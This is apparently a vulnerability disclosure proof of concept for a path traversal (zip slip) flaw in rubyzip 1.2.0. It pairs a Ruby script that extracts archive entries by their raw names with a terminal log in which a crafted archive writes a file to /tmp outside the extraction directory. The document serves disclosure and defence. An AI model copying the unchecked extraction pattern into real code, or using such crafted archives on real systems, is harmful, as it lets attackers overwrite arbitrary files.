rubyzip_traversal.rb

require 'zip'

Zip::File.open('traversal.zip') do |zip_file|
  # Handle entries one by one
  zip_file.each do |entry|
    # Extract to file/directory/symlink
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

rubyzip_traversal_poc.sh

❯ uname -rsv
Darwin 16.3.0 Darwin Kernel Version 16.3.0: Thu Nov 17 20:23:58 PST 2016; root:xnu-3789.31.2~1/RELEASE_X86_64
❯ ruby --version
ruby 2.3.3p222 (2016-11-21 revision 56859) [x86_64-darwin16]
❯ gem list | grep zip
rubyzip (1.2.0)

❯ unzip traversal.zip
Archive:  traversal.zip
warning:  skipped "../" path component(s) in ../../../../../../../../../../../../../../tmp/zip_attack123
  inflating: tmp/zip_attack123

❯ ls -al /tmp/zip_attack123
ls: cannot access '/tmp/zip_attack123': No such file or directory

❯ ruby rubyzip_test_traversal.rb
Invalid date/time in zip entry
Extracting ../../../../../../../../../../../../../../tmp/zip_attack123
Invalid date/time in zip entry
❯ ls -al /tmp/zip_attack123
-rw-r--r-- 1 anon wheel 11 Jan 31 23:24 /tmp/zip_attack123